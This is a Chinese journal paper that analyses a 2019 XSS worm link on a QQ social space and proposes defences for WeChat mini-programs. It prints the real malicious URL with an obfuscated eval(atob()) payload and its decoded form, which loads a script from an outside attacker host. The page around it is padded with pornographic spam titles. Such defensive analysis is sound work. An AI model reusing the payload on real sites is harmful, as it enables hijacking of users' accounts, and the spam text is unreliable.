• <tr id="yyy80"></tr>
  • <sup id="yyy80"></sup>
  • <tfoot id="yyy80"><noscript id="yyy80"></noscript></tfoot>
  • 99热精品在线国产_美女午夜性视频免费_国产精品国产高清国产av_av欧美777_自拍偷自拍亚洲精品老妇_亚洲熟女精品中文字幕_www日本黄色视频网_国产精品野战在线观看 ?

    一個典型的XSS框架注入攻擊的分析和預(yù)防*

    2020-03-25 07:34:56冷雪輝
    通信技術(shù) 2020年1期
    關(guān)鍵詞:攻擊者瀏覽器應(yīng)用程序

    查 杭,冷雪輝

    (南昌工程學(xué)院瑤湖學(xué)院,江西 南昌 330000)

    0 引 言

    隨著信息時代的發(fā)展,人們的各種資料基本實現(xiàn)信息化和網(wǎng)絡(luò)化,但隨之帶來的安全問題越來越嚴(yán)峻。WEB應(yīng)用程序在生活中應(yīng)用非常廣泛,XSS漏洞是WEB應(yīng)用程序中最常見的漏洞。當(dāng)WEB應(yīng)用程序應(yīng)用于金融、社交等要求保密性極高的場所時,敏感數(shù)據(jù)一旦泄露,產(chǎn)生的損失將不可估量。微信小程序是WEB應(yīng)用程序的另一種表現(xiàn),隨著微信用戶的增加,其應(yīng)用范圍越來越廣,因此微信小程序的安全問題受到了越來越多的關(guān)注。

    2019年6月,社交空間中發(fā)生了一起好友紛紛發(fā)帶有惡意鏈接的說說事件,本文通過對鏈接的分析,分析XSS攻擊如何繞開安全機制的檢測成功攻擊用戶,并提出可行的解決方案,不僅能提高用戶對于莫名鏈接的進(jìn)一步認(rèn)識,也能將其應(yīng)用于微信小程序信息安全管理中。

    1 網(wǎng)絡(luò)通信原理

    在網(wǎng)絡(luò)通信中,目前主要的通信方式有TCP和UDP兩種。其中,日常生活中接觸最廣泛的是TCP通信,包括通過瀏覽器或相應(yīng)的應(yīng)用程序請求超文本標(biāo)記網(wǎng)頁,或在網(wǎng)頁內(nèi)或應(yīng)用程序中使用套接字直接向服務(wù)器中請求數(shù)據(jù)。這些請求的過程大都可以看作使用TCP協(xié)議的傳輸過程。在微信小程序的設(shè)計中,考慮到微信小程序客戶端與服務(wù)器端之間的通信問題,微信小程序的官方社區(qū)提供了WebSocket和HTTP兩種網(wǎng)絡(luò)請求方式。其中,WebSocket屬于持久連接,只需建立一次連接請求,在連接關(guān)閉前都可以通過該連接進(jìn)行數(shù)據(jù)交互;HTTP則屬于一次連接,即發(fā)起連接請求后,客戶端會對服務(wù)端進(jìn)行一次request,并攜帶相應(yīng)的請求信息,服務(wù)器對request進(jìn)行響應(yīng),并對請求信息進(jìn)行處理,返回response,連接結(jié)束[1]。

    對于上面兩種連接方式的應(yīng)用,前者可以應(yīng)用在客戶端與服務(wù)器消息傳遞頻率較為頻繁的情況下,如在線聊天室等。因為客戶端與服務(wù)器進(jìn)行長連接,當(dāng)兩者之間的數(shù)據(jù)交互頻率較低時,連接的保持會消耗客戶端和服務(wù)器端的端口、網(wǎng)絡(luò)帶寬及內(nèi)存等資源。在大部分應(yīng)用場景中,如購物、看新聞等,對數(shù)據(jù)的刷新周期一般以分鐘記。若在一分鐘內(nèi)只做一次請求,那么WebSocket形式的長連接顯然不適用。所以,這種情況下主要采用HTTP協(xié)議對服務(wù)器的數(shù)據(jù)進(jìn)行請求。

    對于一般的微信小程序開發(fā)來說,客戶端的網(wǎng)絡(luò)請求一般發(fā)生在頁面加載和數(shù)據(jù)變更時,即:小程序框架解析并渲染頁面,需要從服務(wù)器中請求數(shù)據(jù);在使用微信小程序的過程中,某些地方的數(shù)據(jù)發(fā)生了更改,需要傳遞到服務(wù)器中,也需要向服務(wù)器發(fā)出處理指令。從應(yīng)用分析來看,對于微信小程序的網(wǎng)絡(luò)請求設(shè)計方面,以HTTP協(xié)議作為主要傳輸形式更合理。

    HTTP協(xié) 議 有 GET、HEAD、POST、PUT、DELETE、CONNECT、OPTIONS和TRACE8種請求方式。其中,微信小程序用于從服務(wù)器端獲取數(shù)據(jù)和將本地發(fā)生的更改上傳至服務(wù)器中主要采用GET和PUT兩種方式,且對于HTTP協(xié)議,HTTP請求有著固定的格式:

    上面的HTTP請求消息包括請求類型、請求目標(biāo)、客戶端、請求類型及編碼等。因此,微信小程序進(jìn)行網(wǎng)絡(luò)請求時,要先明確請求目標(biāo)即主機名,之后再向主機發(fā)送請求的資源信息[2-3]。

    2 從網(wǎng)頁鏈接說起

    基于HTTP協(xié)議,網(wǎng)絡(luò)瀏覽器能夠幫助人們以一種簡單的方式訪問互聯(lián)網(wǎng)資源。使用瀏覽器訪問目標(biāo)網(wǎng)站,只需要知道該目標(biāo)網(wǎng)站的站點主機名稱即可。由瀏覽器通過DNS服務(wù)器為查詢該主機地址,并對該主機發(fā)送HTTP請求。隨著WEB應(yīng)用程序等相關(guān)技術(shù)和產(chǎn)業(yè)的不斷發(fā)展,網(wǎng)絡(luò)請求也從早期的單純對文本或圖像等媒體文件的請求,演變成了很多其他功能性請求。伴隨著它的功能復(fù)雜化,網(wǎng)絡(luò)請求的資源名稱也愈加復(fù)雜。于是,部署在服務(wù)器端、作為網(wǎng)站連接請求的預(yù)處理先驅(qū)CGI的作用開始凸顯。現(xiàn)在使用瀏覽器訪問網(wǎng)頁時,瀏覽器的請求地址欄可能不再是純粹的文件路徑?,F(xiàn)在大部分網(wǎng)站服務(wù)器已經(jīng)支持站內(nèi)的路由導(dǎo)航,網(wǎng)站系統(tǒng)也支持通過CGI從網(wǎng)絡(luò)請求鏈接中提取隨著request發(fā)送的請求數(shù)據(jù)中的參數(shù)變量,這些參數(shù)可能是傳遞的信息,也可能是客戶端發(fā)送到服務(wù)器的特定指令,作為程序執(zhí)行的相關(guān)變量參數(shù)[4]。

    當(dāng)前比較主流的WEB應(yīng)用程序的參數(shù)傳遞方式主要有兩種。

    (1)直接對網(wǎng)站中的動態(tài)網(wǎng)頁進(jìn)行請求,在目標(biāo)的資源地址后補充’?’并以{參數(shù)名}={值}的形式進(jìn)行傳遞。網(wǎng)站服務(wù)器把相關(guān)參數(shù)單獨提取解析后,傳遞給請求的動態(tài)頁面處理程序。

    (2)根據(jù)網(wǎng)站服務(wù)器的路由配置,使用參數(shù)配置路由,且相鄰層級的路由參數(shù)用’/’分隔,主要形式為{主機名}/{參數(shù)1}/{參數(shù)二}。

    采用第一種方法以傳遞參數(shù)不受服務(wù)器路由配置的限制,不限參數(shù)數(shù)量和參數(shù)類型,且此種方法的參數(shù)配置發(fā)生錯誤時錯誤不會引起路由系統(tǒng)錯誤。但是,該參數(shù)的作用模式可以直接作用于動態(tài)資源的配置程序,相比于路由參數(shù),其內(nèi)容在從網(wǎng)絡(luò)傳輸層到程序應(yīng)用層直接缺乏路由系統(tǒng)的初步檢驗,其安全性較第二種參數(shù)傳遞方法較低[5]。因此,采用第一種參數(shù)傳遞方法服務(wù)器在使用該參數(shù)之前需要做一次額外檢驗,以保證在該處惡意代碼不會通過參數(shù)的傳遞注入到程序框架中。

    3 發(fā)現(xiàn)問題并進(jìn)行分析

    2019年6月,某社交空間有一則誘導(dǎo)惡意轉(zhuǎn)發(fā)的鏈接。用戶在私人空間中點擊該鏈接會按明文鏈接的順序跳轉(zhuǎn)3次到新浪微博主頁,同時用戶點擊后,用戶空間會在不提醒用戶的情況下自動轉(zhuǎn)發(fā)該內(nèi)容。其他用戶通過其私人空間的點擊和轉(zhuǎn)發(fā),使得這個注入攻擊迅速擴散。為了避免類似的事情發(fā)生在更多網(wǎng)站項目中,本文將對這個惡意注入實例對HTTP網(wǎng)頁鏈接的安全性進(jìn)行討論,并提出相應(yīng)的解決或預(yù)防方案尤為必要。

    首先,獲取該惡意鏈接:

    http://open.qzone.qq.com/url_check?url=https%3A%2F%2Fweibo.cn%2Fsinaurl%3F_wv%3D1027%2 6cmd%3Dplay%26u%3Dhttp%253A%252F%252Fct.epro.sogou.com%252Fct%253Fid%253D1025611%2 526h%253D333%2526w%253D33336%2526fv%253 D32%2526if%253D16%2526sohuurl%253Dhttps%2 5253A%25252F%25252Fnews.china.com%25252Ft_we1561734359ZWl0ZQ.html%2526bs%253D1423%25 2C794%252522%257D%257D%25250a%253Beval%2 528atob%2528%252522ZG9jdW1lbnQud3JpdGUoIjxz Y3JpcHQgc3JjPSdodHRwOi8vbS5qcXVlcnkua2ltOjgwO-TAvd2ViL2lmLnBocD8xMjMnPjwvc2NyaXB0PiIp%252522%2529%2529%253B%25250aif%2528O%2 529%257Bif%2528B%2529%257B%2525221%2526t mp_cdif%253D0%2526mi%253D0%2526m%253DMT U1OTQwMzcwMV9wcmV0dHkgZG9nXzEwMjU2MTEA%2526ex%253D%2526glx%253D0%2526r%253D1561 734359%2526business%253D%2523123&cmd=play&_wv=2098179#123

    由鏈接形式可以看出,鏈接中含有大量的%xx格式的代碼。該代碼為URL編碼,將其轉(zhuǎn)化為Unicode得到:

    http://open.qzone.qq.com/url_check?url=https://weibo.cn/sinaurl?_wv=1027&cmd=play&u=http://ct.epro.sogou.com/ct?id=1025611&h=333&w=3333 6&fv=32&if=16&sohuurl=https://news.china.com/t_we1561734359ZWl0ZQ.html&bs=1423,794"}};eval(ato b("ZG9jdW1lbnQud3JpdGUoIjxzY3JpcHQgc3JjPSdodH RwOi8vbS5qcXVlcnkua2ltOjgwOTAvd2ViL2lmLnBocD 8xMjMnPjwvc2NyaXB0PiIp"));if(O){if(B){"1&tmp_cdif=0&mi=0&m=MTU1OTQwMzcwMV9wcmV0dHkgZG9n XzEwMjU2MTEA&ex=&glx=0&r=1561734359&busine ss=#123&cmd=play&_wv=2098179#123”

    對該鏈接逐層級分析。首先,鏈接最底層是http://one.qq.com/url_check,這是QQ空間的外鏈校驗域,后面攜帶參數(shù)URL,其值為:

    https://weibo.cn/sinaurl?_wv=1027&cmd=play&u=http://ct.epro.sogou.com/ct

    該鏈接打開后能夠跳轉(zhuǎn)到URL參數(shù)值指向的鏈接中,因此第二階跳轉(zhuǎn)到:

    https://weibo.cn/sinaurl

    該鏈接仍為跳轉(zhuǎn)鏈接,其跳轉(zhuǎn)目標(biāo)為參數(shù)u的值,即:

    http://ct.epro.sogou.com/ct?id=1025611&h=333&w=33336&fv=32&if=16&sohuurl=https://news.china.com/t_we1561734359ZWl0ZQ.html&bs=1423,794"}};eval(at ob("ZG9jdW1lbnQud3JpdGUoIjxzY3JpcHQgc3JjPSdod HRwOi8vbS5qcXVlcnkua2ltOjgwO-TAvd2ViL2lmLnBo cD8xMjMnPjwvc2NyaXB0PiIp"));

    該鏈接為搜狗推廣的鏈接,也是最后一級的跳轉(zhuǎn)鏈接。從該鏈接中可以提取到參數(shù)id、h、w、fv、if、sohuurl和bs。根據(jù)在搜狗廣告推廣界面的一般規(guī)律,可以得到這些參數(shù)為廣告推廣的相關(guān)信息,內(nèi)容也沒有問題,且原鏈接在最后一個參數(shù)的底端使用兩個“}}”做了數(shù)據(jù)閉合,因此惡意代碼注入發(fā)生在分號后面的eval(atob("ZG9jdW1lbnQud3J pdGUoIjxzY3JpcHQgc3JjPSdodHRwOi8vbS5qcXVlcnk ua2ltOjgwOTAvd2ViL2lmLnBocD8xMjMnPjwvc2NyaX B0PiIp"))。

    根據(jù)W3C的定義,atob()函數(shù)的作用在于將base64編碼的字符串還原;eval()提供了一個接口,使得鏈接中的腳本可以被解釋執(zhí)行,甚至可以通過URL執(zhí)行頁面中的腳本程序。按照這個思路,需要將字符串“ZG9…”進(jìn)行解密,解密結(jié)果為:

    “document.write("<script src='http://m.jquery.kim:8090/web/if.php?123'></script>")”

    這行代碼的意思是在當(dāng)前頁面中寫入一個來自“http://m.jquery.kim:8090/web/if.php?123”的腳本。從這里看此處是一個典型的XSS跨域攻擊。先是在開放平臺中利用URL函數(shù)逃過了BO檢查,向頁面中寫入了一個外源腳本,接著外源腳本產(chǎn)生作用。由于用戶主要使用該社交空間旗下的瀏覽器訪問該社交空間,外源的跨域腳本公式利用其CSRF漏洞對用戶的社交空間產(chǎn)生相關(guān)作用,在此漏洞下,攻擊者利用其進(jìn)行惡意轉(zhuǎn)發(fā)。

    該攻擊的核心原理可以簡述如下:

    (1)攻擊者利用base64編碼隱藏敏感信息,且將帶有攻擊行為的鏈接制作成層層跳轉(zhuǎn)的形式,以繞過相關(guān)安全機制的檢測。

    (2)攻擊者注入代碼的鏈接能夠在某些平臺上成功執(zhí)行,且執(zhí)行后該平臺未主動監(jiān)測惡意腳本來源,使得該XSS攻擊在用戶本地生效而攻擊成功。

    (3)該社交空間在瀏覽器和WEB應(yīng)用程序中的交互可能存在漏洞,使得攻擊者可以利用WEB應(yīng)用程序?qū)浖男湃纬晒?zhí)行CSRF攻擊。

    4 提出可行解決方案

    在微信小程序開發(fā)過程中也會遇到相關(guān)問題。由于微信小程序去除了外源的腳本引用,使得其在本地更加安全。但是,微信小程序的數(shù)據(jù)來源于運行在云端的遠(yuǎn)程服務(wù)器,而遠(yuǎn)程服務(wù)器與微信小程序的信息通信主要通過HTTP的數(shù)據(jù)請求實現(xiàn),因此存在XSS攻擊的可能。

    一般情況下,微信小程序向服務(wù)器端發(fā)送的請求主要為GET和PUT。通過前者,服務(wù)器可以根據(jù)小程序傳遞的相關(guān)參數(shù)解析參數(shù),并返回相應(yīng)的結(jié)果。對于后者,微信小程序向服務(wù)器發(fā)送內(nèi)容更新指令,服務(wù)器解析指令參數(shù),執(zhí)行相應(yīng)的操作,并返回相應(yīng)的結(jié)果。根據(jù)其作用方式的特點,可以總結(jié)其攻擊方式如下。

    對于GET請求,攻擊者可以篡改request中的內(nèi)容,使之傳遞到服務(wù)器后,在服務(wù)器處理參數(shù)的過程中造成程序出錯或使得服務(wù)器返回錯誤的結(jié)果。同時,在response的過程中,攻擊者也可以向其中注入惡意代碼,引起客戶端的數(shù)據(jù)處理模塊出錯或產(chǎn)生錯誤結(jié)果,甚至可能引起惡意指令對個人信息安全造成影響。

    對于PUT請求,由于傳遞的參數(shù)中有更多的指令元素,攻擊者通過直接的錯誤信息注入,可能使得服務(wù)器處理程序直接崩潰,甚至影響整個系統(tǒng)的后端數(shù)據(jù)安全。

    所以,在微信小程序中對XSS攻擊進(jìn)行探討和防范特別重要。

    對于以上分析的幾點問題,提出如下解決方案:

    (1)在整個通信過程中采用嚴(yán)格的鑒權(quán)通信模式,即使用預(yù)定的SECRETKEY對原文進(jìn)行數(shù)字簽名,服務(wù)器端校驗數(shù)字簽名后開始正式通信。

    (2)將通信內(nèi)容進(jìn)行對稱加密,配合鑒權(quán)機制,不僅能夠保證數(shù)據(jù)可靠,也能保證數(shù)據(jù)在傳輸過程中的安全系數(shù)。

    (3)服務(wù)器和客戶端對傳遞的消息進(jìn)行檢驗,確保沒有非法的腳本或者惡意指令的注入。

    5 結(jié) 語

    隨著WEB應(yīng)用程序的發(fā)展,它的應(yīng)用愈加廣泛。WEB應(yīng)用程序的安全問題對于WEB應(yīng)用程序開發(fā)者來說顯得愈加重要。維護(hù)網(wǎng)絡(luò)安全是每個人的責(zé)任,在防范可能發(fā)生的危險的同時,也要共同維護(hù)互聯(lián)網(wǎng)的和諧大環(huán)境,為網(wǎng)絡(luò)凈化貢獻(xiàn)力量。

    作為開發(fā)者,應(yīng)該以數(shù)據(jù)安全為中心。在設(shè)計和開發(fā)數(shù)據(jù)接口時應(yīng)該考慮全面,在模擬測試階段就應(yīng)該確保數(shù)據(jù)能夠絕對安全。同時,開發(fā)者應(yīng)時刻關(guān)注目前網(wǎng)絡(luò)上流行的攻擊方式,并時常檢查應(yīng)用軟件可能存在的問題并不斷完善。

    對于一款高效且實用的微信小程序來說,安全是任何強大功能的前提。設(shè)計開發(fā)小程序和WEB應(yīng)用時,必須嚴(yán)格按照加密通信方案設(shè)計,并且在設(shè)計過程中減少對外部程序的依賴,包括URL程序和外置腳本或其他資源。因為有外部的內(nèi)容可能會為軟件增光添彩,也可能帶來被攻擊的危險。

    猜你喜歡
    攻擊者瀏覽器應(yīng)用程序
    基于微分博弈的追逃問題最優(yōu)策略設(shè)計
    刪除Win10中自帶的應(yīng)用程序
    電腦報(2019年12期)2019-09-10 05:08:20
    反瀏覽器指紋追蹤
    電子制作(2019年10期)2019-06-17 11:45:14
    正面迎接批判
    愛你(2018年16期)2018-06-21 03:28:44
    環(huán)球瀏覽器
    再見,那些年我們嘲笑過的IE瀏覽器
    有限次重復(fù)博弈下的網(wǎng)絡(luò)攻擊行為研究
    關(guān)閉應(yīng)用程序更新提醒
    電腦迷(2012年15期)2012-04-29 17:09:47
    三星電子將開設(shè)應(yīng)用程序下載商店
    微軟軟件商店開始接受應(yīng)用程序
    男人和女人高潮做爰伦理| 三级男女做爰猛烈吃奶摸视频| 欧美日本亚洲视频在线播放| 欧美性猛交╳xxx乱大交人| 亚洲四区av| 国产精品永久免费网站| 日韩在线高清观看一区二区三区| 天天躁夜夜躁狠狠久久av| 高清日韩中文字幕在线| 91在线精品国自产拍蜜月| 性插视频无遮挡在线免费观看| 综合色av麻豆| 国产探花极品一区二区| 亚洲欧美成人精品一区二区| 日日摸夜夜添夜夜添av毛片| h日本视频在线播放| 嫩草影视91久久| 99热网站在线观看| or卡值多少钱| 亚洲aⅴ乱码一区二区在线播放| videossex国产| 99热全是精品| 久久久久久久久久久丰满| 青春草视频在线免费观看| 欧美激情久久久久久爽电影| 国产女主播在线喷水免费视频网站 | 国产国拍精品亚洲av在线观看| 亚洲熟妇中文字幕五十中出| 嫩草影院精品99| 天天躁日日操中文字幕| 最近在线观看免费完整版| 一进一出抽搐动态| 麻豆乱淫一区二区| 又爽又黄a免费视频| 波多野结衣巨乳人妻| 女同久久另类99精品国产91| 亚洲精品一区av在线观看| 亚洲欧美日韩无卡精品| 日韩欧美三级三区| av免费在线看不卡| 久久久久久久午夜电影| 激情 狠狠 欧美| 人人妻人人澡人人爽人人夜夜 | 丝袜喷水一区| 啦啦啦韩国在线观看视频| 久久久久久久久久久丰满| 国内精品久久久久精免费| 欧美+日韩+精品| 九九在线视频观看精品| 久久久午夜欧美精品| 国产伦精品一区二区三区视频9| 国产精品三级大全| 日本黄色视频三级网站网址| 久久人人精品亚洲av| 五月玫瑰六月丁香| 91在线精品国自产拍蜜月| 国产成人aa在线观看| 久久久久久久久久久丰满| 中文资源天堂在线| 亚洲精品久久国产高清桃花| 久久九九热精品免费| 免费看日本二区| 精品久久久噜噜| 久久久久国产网址| 亚洲电影在线观看av| 日韩欧美精品v在线| 国产亚洲91精品色在线| 欧美成人a在线观看| 中文字幕精品亚洲无线码一区| 欧美3d第一页| 美女被艹到高潮喷水动态| 免费无遮挡裸体视频| 神马国产精品三级电影在线观看| 国产高清激情床上av| 国产黄a三级三级三级人| 日日撸夜夜添| 久久久久久久久大av| 99九九线精品视频在线观看视频| 国产高清有码在线观看视频| 91久久精品国产一区二区三区| 露出奶头的视频| 国产一区二区亚洲精品在线观看| 欧美成人a在线观看| 99热这里只有是精品在线观看| 久久久精品大字幕| 久久久久国产网址| 亚洲精品在线观看二区| 久久久久久久久大av| 最近中文字幕高清免费大全6| 少妇人妻精品综合一区二区 | 美女cb高潮喷水在线观看| 中出人妻视频一区二区| 亚洲三级黄色毛片| 一个人看视频在线观看www免费| 精品一区二区三区视频在线观看免费| 自拍偷自拍亚洲精品老妇| 免费电影在线观看免费观看| 亚洲无线在线观看| 在线观看午夜福利视频| 亚洲一区高清亚洲精品| 啦啦啦观看免费观看视频高清| 亚洲av五月六月丁香网| 波多野结衣高清无吗| 97超视频在线观看视频| 欧美在线一区亚洲| 欧美另类亚洲清纯唯美| 伦精品一区二区三区| 在线天堂最新版资源| 亚洲乱码一区二区免费版| 美女黄网站色视频| 天天躁日日操中文字幕| 久久午夜亚洲精品久久| 午夜激情欧美在线| 亚洲精品乱码久久久v下载方式| 国产在线男女| 在线观看66精品国产| 又粗又爽又猛毛片免费看| 99久久精品热视频| 狂野欧美激情性xxxx在线观看| 在线观看午夜福利视频| 久久精品国产99精品国产亚洲性色| 黄色欧美视频在线观看| 又黄又爽又免费观看的视频| 亚洲精品亚洲一区二区| 久久久久久伊人网av| 免费观看人在逋| 亚洲欧美精品综合久久99| .国产精品久久| 日韩欧美三级三区| 欧美3d第一页| 国产熟女欧美一区二区| 中国国产av一级| 如何舔出高潮| 国产亚洲精品久久久久久毛片| 欧美精品国产亚洲| 桃色一区二区三区在线观看| 小说图片视频综合网站| 久久久久久大精品| 日本三级黄在线观看| 午夜福利在线观看免费完整高清在 | 国产蜜桃级精品一区二区三区| 免费观看的影片在线观看| 天堂av国产一区二区熟女人妻| 人人妻人人澡欧美一区二区| 欧美激情在线99| 级片在线观看| 亚洲真实伦在线观看| 日日干狠狠操夜夜爽| 国产 一区 欧美 日韩| 国产精品综合久久久久久久免费| 亚洲七黄色美女视频| 别揉我奶头 嗯啊视频| 精品一区二区三区人妻视频| 国产高清有码在线观看视频| 99精品在免费线老司机午夜| 亚洲成人中文字幕在线播放| 日韩亚洲欧美综合| 97超碰精品成人国产| 国产 一区精品| videossex国产| 国产欧美日韩精品一区二区| 男女下面进入的视频免费午夜| 国产亚洲av嫩草精品影院| 亚洲人成网站在线观看播放| 丰满的人妻完整版| a级毛色黄片| 色综合色国产| 欧美一区二区国产精品久久精品| 在线播放国产精品三级| 12—13女人毛片做爰片一| 免费观看人在逋| 尤物成人国产欧美一区二区三区| 男人舔奶头视频| 狠狠狠狠99中文字幕| 亚洲精品成人久久久久久| 插阴视频在线观看视频| 免费一级毛片在线播放高清视频| 国产高清激情床上av| 99在线视频只有这里精品首页| 中国美白少妇内射xxxbb| 久久精品夜夜夜夜夜久久蜜豆| 久久国内精品自在自线图片| 日韩,欧美,国产一区二区三区 | 深夜a级毛片| 国模一区二区三区四区视频| 欧美+日韩+精品| 亚洲av.av天堂| 可以在线观看的亚洲视频| 欧美+日韩+精品| 国产精品免费一区二区三区在线| 最新在线观看一区二区三区| 国产成人精品久久久久久| 欧美性猛交╳xxx乱大交人| 亚洲国产精品国产精品| 国内少妇人妻偷人精品xxx网站| 综合色丁香网| 国产aⅴ精品一区二区三区波| 在线观看av片永久免费下载| 午夜老司机福利剧场| 人人妻人人看人人澡| 男人舔女人下体高潮全视频| 久久久久性生活片| 国产成人精品久久久久久| 少妇裸体淫交视频免费看高清| av黄色大香蕉| 美女大奶头视频| 亚洲四区av| 内射极品少妇av片p| 日韩制服骚丝袜av| 一边摸一边抽搐一进一小说| 精品久久久久久久人妻蜜臀av| 久久人人精品亚洲av| 日韩高清综合在线| 国产精品亚洲美女久久久| 国产高潮美女av| 亚洲无线在线观看| 中文在线观看免费www的网站| 黄色配什么色好看| 天堂√8在线中文| 国产精品伦人一区二区| 97碰自拍视频| 日本欧美国产在线视频| 国产精品国产高清国产av| 床上黄色一级片| 精品99又大又爽又粗少妇毛片| 国产免费一级a男人的天堂| 日本a在线网址| 国产成人a区在线观看| 亚洲自拍偷在线| 国内精品宾馆在线| 伦理电影大哥的女人| АⅤ资源中文在线天堂| 色尼玛亚洲综合影院| 此物有八面人人有两片| 欧美色视频一区免费| 国产精品一区二区三区四区免费观看 | 干丝袜人妻中文字幕| 成年女人看的毛片在线观看| 免费人成视频x8x8入口观看| 久久亚洲国产成人精品v| 久久中文看片网| 免费看av在线观看网站| 国产爱豆传媒在线观看| 久久国内精品自在自线图片| 免费av不卡在线播放| 狂野欧美激情性xxxx在线观看| 亚洲天堂国产精品一区在线| 亚洲自拍偷在线| 国产欧美日韩一区二区精品| 在线a可以看的网站| 俄罗斯特黄特色一大片| 欧美潮喷喷水| 国产精品国产三级国产av玫瑰| 成人二区视频| 亚洲精品亚洲一区二区| 最近在线观看免费完整版| 免费无遮挡裸体视频| 亚洲最大成人av| 亚洲国产精品久久男人天堂| 国产真实伦视频高清在线观看| 亚洲最大成人手机在线| 亚洲专区国产一区二区| 69人妻影院| 麻豆一二三区av精品| 久久婷婷人人爽人人干人人爱| 三级毛片av免费| 亚洲成人av在线免费| 国产精品女同一区二区软件| 麻豆一二三区av精品| 99久久中文字幕三级久久日本| 女人被狂操c到高潮| 三级国产精品欧美在线观看| 亚洲精品国产av成人精品 | 俺也久久电影网| 欧美人与善性xxx| 久久人人爽人人爽人人片va| 国产综合懂色| 国产成人91sexporn| 国产69精品久久久久777片| 国产成人精品久久久久久| 欧美在线一区亚洲| 人妻制服诱惑在线中文字幕| 深爱激情五月婷婷| 在线国产一区二区在线| 九色成人免费人妻av| av黄色大香蕉| 男女做爰动态图高潮gif福利片| 麻豆精品久久久久久蜜桃| 亚洲一区二区三区色噜噜| 六月丁香七月| 伦理电影大哥的女人| 国国产精品蜜臀av免费| 欧美3d第一页| 国产黄片美女视频| 国产成人91sexporn| 免费人成视频x8x8入口观看| 蜜桃亚洲精品一区二区三区| 国产黄片美女视频| 亚洲综合色惰| 高清毛片免费观看视频网站| 国产精品亚洲美女久久久| 精品国产三级普通话版| 在线观看午夜福利视频| 老女人水多毛片| 亚洲欧美精品自产自拍| 久久人人爽人人爽人人片va| 国产精品美女特级片免费视频播放器| 97超碰精品成人国产| 五月伊人婷婷丁香| 国产精品久久视频播放| 久久久久久久亚洲中文字幕| 99国产极品粉嫩在线观看| av在线天堂中文字幕| 99热这里只有精品一区| 男女那种视频在线观看| 日本黄色片子视频| 全区人妻精品视频| 国产黄a三级三级三级人| 免费看av在线观看网站| 亚洲中文字幕日韩| 成人漫画全彩无遮挡| 亚洲图色成人| 久久热精品热| av在线播放精品| 老司机午夜福利在线观看视频| 久久久久久久久久成人| 精品一区二区三区人妻视频| 九九热线精品视视频播放| 亚洲国产精品国产精品| 99久久久亚洲精品蜜臀av| 成人亚洲欧美一区二区av| 蜜臀久久99精品久久宅男| 校园人妻丝袜中文字幕| 精品99又大又爽又粗少妇毛片| ponron亚洲| 亚洲婷婷狠狠爱综合网| 成人永久免费在线观看视频| 亚洲一级一片aⅴ在线观看| 一级av片app| 国产极品精品免费视频能看的| 最近中文字幕高清免费大全6| 精品一区二区三区av网在线观看| 两个人的视频大全免费| 亚洲aⅴ乱码一区二区在线播放| 日韩一区二区视频免费看| 久久99热这里只有精品18| 久久九九热精品免费| a级一级毛片免费在线观看| 亚洲欧美日韩无卡精品| 成人av在线播放网站| 国产精品亚洲一级av第二区| 欧美日韩乱码在线| 免费观看精品视频网站| 亚洲av中文av极速乱| 美女xxoo啪啪120秒动态图| 一本精品99久久精品77| 97人妻精品一区二区三区麻豆| 午夜精品在线福利| 又黄又爽又免费观看的视频| 国产精品,欧美在线| 在线免费观看不下载黄p国产| 又黄又爽又免费观看的视频| 久久久久久久久大av| 日本一二三区视频观看| a级一级毛片免费在线观看| 国产一级毛片七仙女欲春2| 亚洲熟妇中文字幕五十中出| 日本黄色片子视频| 在线天堂最新版资源| 久久6这里有精品| 如何舔出高潮| 黄色一级大片看看| 国产精品一区二区三区四区久久| 18禁在线无遮挡免费观看视频 | 免费无遮挡裸体视频| 国国产精品蜜臀av免费| 免费黄网站久久成人精品| 成人av一区二区三区在线看| 日日摸夜夜添夜夜爱| 国产探花在线观看一区二区| 亚洲欧美成人综合另类久久久 | 色吧在线观看| 国产成人a区在线观看| 国产一区亚洲一区在线观看| 成人一区二区视频在线观看| 麻豆国产97在线/欧美| 啦啦啦观看免费观看视频高清| 久久久久久久久久黄片| 亚洲在线观看片| 国产欧美日韩精品亚洲av| 淫妇啪啪啪对白视频| 亚洲一级一片aⅴ在线观看| 国产高清三级在线| 国产黄a三级三级三级人| 99久久精品一区二区三区| 精品久久久久久久久av| 久久久欧美国产精品| 国产一区二区三区在线臀色熟女| 久久久久久久久久成人| 亚洲国产精品成人综合色| 伦理电影大哥的女人| 男女视频在线观看网站免费| 99视频精品全部免费 在线| 男插女下体视频免费在线播放| 夜夜看夜夜爽夜夜摸| 亚洲欧美清纯卡通| 亚洲一区二区三区色噜噜| 久久久国产成人免费| 在线观看av片永久免费下载| 久久99热6这里只有精品| 深夜a级毛片| 人妻久久中文字幕网| 午夜a级毛片| 久久精品国产鲁丝片午夜精品| 久久精品国产亚洲av香蕉五月| 亚洲第一电影网av| 精品午夜福利在线看| 啦啦啦观看免费观看视频高清| 国产成人福利小说| 搡老熟女国产l中国老女人| 欧美日韩乱码在线| 黄色日韩在线| 禁无遮挡网站| 欧美一区二区精品小视频在线| 久99久视频精品免费| 久久欧美精品欧美久久欧美| 欧美3d第一页| 婷婷六月久久综合丁香| 亚洲在线自拍视频| a级毛片a级免费在线| 搡老熟女国产l中国老女人| 搡老妇女老女人老熟妇| av福利片在线观看| 久久九九热精品免费| 久久久久久九九精品二区国产| 日韩 亚洲 欧美在线| 亚洲真实伦在线观看| 亚洲精品456在线播放app| 日韩中字成人| 久久人妻av系列| 国产男人的电影天堂91| 久久久欧美国产精品| 一个人免费在线观看电影| 亚洲最大成人中文| 国产精品久久视频播放| 免费电影在线观看免费观看| 欧美成人精品欧美一级黄| 亚洲欧美成人综合另类久久久 | 国产单亲对白刺激| 国产蜜桃级精品一区二区三区| 日本一本二区三区精品| 色综合站精品国产| 国产精品乱码一区二三区的特点| 美女内射精品一级片tv| 亚洲一区二区三区色噜噜| 久久精品夜色国产| 精品久久久久久久久亚洲| 国产av一区在线观看免费| 国产高清视频在线观看网站| 国产激情偷乱视频一区二区| 亚洲av一区综合| 三级经典国产精品| 99在线视频只有这里精品首页| 久久欧美精品欧美久久欧美| 午夜福利成人在线免费观看| 国产私拍福利视频在线观看| 亚洲人成网站高清观看| 日韩强制内射视频| 人妻制服诱惑在线中文字幕| 国产精华一区二区三区| 人人妻,人人澡人人爽秒播| 一级av片app| 丰满的人妻完整版| 日日摸夜夜添夜夜添小说| 免费大片18禁| 精品不卡国产一区二区三区| 在现免费观看毛片| 色在线成人网| 日韩欧美国产在线观看| 丰满乱子伦码专区| 欧美不卡视频在线免费观看| 毛片女人毛片| 国产精品福利在线免费观看| 亚洲国产精品国产精品| 成年女人永久免费观看视频| 